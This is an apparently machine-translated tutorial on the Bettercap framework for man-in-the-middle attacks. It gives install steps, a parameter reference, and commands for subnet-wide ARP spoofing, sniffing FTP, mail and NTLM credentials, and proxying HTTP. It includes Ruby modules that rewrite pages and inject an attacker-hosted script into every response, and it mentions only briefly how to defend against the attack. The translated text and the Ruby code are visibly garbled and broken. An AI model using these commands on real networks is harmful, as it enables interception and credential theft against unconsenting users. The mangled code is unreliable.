Turn: Man-in-the-middle attack using framework Bettercap test

0x00 Preface

The previous article mentioned that the infiltration of the intranet is very interesting, this time from a new tool: Bettercap

About 0X01

Bettercap can be used to achieve a variety of man-in-the-middle attacks, modular, portable, easy to expand

0X02 Features

When it comes to man-in-the-middle attacks, the best known is ettercap, and the purpose of developing bettercap is not to chase it, but to replace it for the following reasons:

1, Ettercap is very successful, but in the new era it is already old 2, Ettercap filter complex, the use of high threshold 3, in large networks, the host found the function of poor 4, optimization is not enough, for the researcher, useless function too much 5, the expansion is not enough, the development needs to master C + + language

0X03 Test Environment Construction

Kali Linux:

clone https://github.com/evilsocket/bettercapcd bettercapgem build bettercap.gemspecsudo gem install bettercap*.gem

If an error is

Execute the following command:

sudo apt-get install ruby-dev libpcap-devsudo gem install bettercap*.gem   

Finally successful,

0x04 parameter Description

Translated and added personal understanding

Usage:

-I,--interface IFACE Specify network interface name, default eth0

-S,--spoofer NAME Specifies the spoofing module, this parameter defaults to ARP, currently only supports ARP, the new version will add more options

-T,--target ADDRESS specifies a single IP, if not set, on behalf of all subnets, subnets all host automatic scanning, simple and efficient, highly recommended-O,--log log_file log function

-D,--debug Debug feature, each step of the operation of detailed records, easy to debug

-l,--local resolves all packets flowing through this machine (this operation will turn on the sniffer), this parameter is off by default

-X,--sniffer turn on the sniffer. --sniffer-pcap file saves the packet as a pcap. Wireshark open (This action turns on the sniffer)--sniffer-filter EXPRESSION configuration sniffer uses the BPF filter (this action turns on the sniffer)

-P,--parsers parsers specifies the packet (this action opens the sniffer), supports NTLMSS, IRC, POST, URL, FTP, HTTPS, Httpauth, MAIL, this parameter defaults to all--no-discovery using only the current ARP cache, do not scan other hosts, this parameter is turned off by default--no-spoofing shutdown Spoofing module, you can also use the parameter--spoofer none instead of--proxy enable HTTP proxy and redirect all HTTP requests to the native, this parameter is off by default-- Proxy-port Port Sets the HTTP proxy port, this parameter defaults to 8080--proxy-module module specifies that the loaded Ruby module--HTTPD turn on the HTTP server, which by default is off--httpd-port port Specify HTTP server port, which defaults to 8081. --httpd-path path Specifies the HTTP server path, which defaults to./.

-H,--help English help

0x05 function Test 1, HOST DISCOVERY + ARP man in the middle

sudo bettercap -X

Scan all intranet hosts, fool-type operation, automatic scanning and ARP spoofing, so that all traffic through the machine,

2, CREDENTIALS SNIFFER

Fetch valuable information from the traffic, including:

URLs being visited.HTTPS host being visited.HTTP POSTed data.HTTP Basic and Digest authentications.FTP credentials.IRC credentials.POP, IMAP and SMTP credentials.NTLMv1/v2 ( HTTP, SMB, LDAP, etc ) credentials.

Examples of usage:

Default fool mode, turn on all features:

sudo bettercap -X

Landing data for 163 of mailboxes caught

Specify the crawled packet:

sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS"

For catching 192.168.40.146 of FTP

3, MODULAR TRANSPARENT PROXY

Proxy capability to intercept tampering with HTTP traffic

Examples of usage:

To turn on the proxy feature:

sudo bettercap --proxy

Turn on the proxy feature and specify the port:

sudo bettercap --proxy --proxy-port=8081

Turn off ARP spoofing, turn on proxy only

sudo bettercap -S NONE --proxy

Turn on the proxy function and load the specified Ruby module

sudo bettercap --proxy --proxy-module=hack_title.rb

Ruby Reference Example:

 class hacktitle  < proxy::module def on_ Request (request, response) # is it a HTML page? if response.content_type =  ' text/html '  Logger.info  "Hacking http://#{request.host}#{ Request.url} title Tag "# make sure to use sub! or gsub! to update the instance response.body.sub! (  ' <title> ',  <title>!!! Hacked!!! ') end endend      

feature to replace all HTML caption options

4. BUILTIN HTTP SERVER

Built-in HTTP server functionality to tamper with HTTP response package content

Examples of usage:

Inject a JS file into each HTTP response of the network

sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb

Ruby Reference Example:

ClassInjectjs<Proxy::moduleDefOn_request(Request, response)# Is it a HTML page?if response.content_type =  ' text/html '  Logger.info  "injecting JavaScript file into Http://#{request.host}#{request.url} page "# get the Local interface address and HTTPD port localaddr = 
                     
                      context.get.iface[
                      :ip_saddr] LocalPort =  Context.get.options[:httpd_port] # inject the JS response.body.sub! ( Span class= "string" > ' </title> ',  "</title><script src= '/http #{localaddr}:#{localport}/file.js ' type= ' Text/javascript ' ></ Script> ") end endend    
                     

0X06 Test Experience

Highlight:

Man-in-the-middle attack using the framework of development, portability, installation simple integration of a variety of common functions, functional modularity, automatic deception attacks, improve efficiency greatly reduce the use of tools and development threshold

Insufficient:

目前只支持arp欺骗，功能仍需完善。暂不支持windows

0X07 Summary

Before I used C + + to develop ARP spoofing & Man-in-the-middle attack program, personally think that the success of ARP spoofing is the key to the ARP cache table modification, locking ARP cache table can now defend Bettercap ARP-based man-in-the-middle attack but I believe that The prospect of bettercap is very broad.

0x08 Supplement

Bettercap:

http://www.bettercap.org/

The level is limited, welcome to add.

Note: The article mainly goes to the cloud knowledge Base, where the content has been tested on Ubuntu 14.04, no problem. If you have any questions, please contact me.

Turn: Man-in-the-middle attack using framework Bettercap test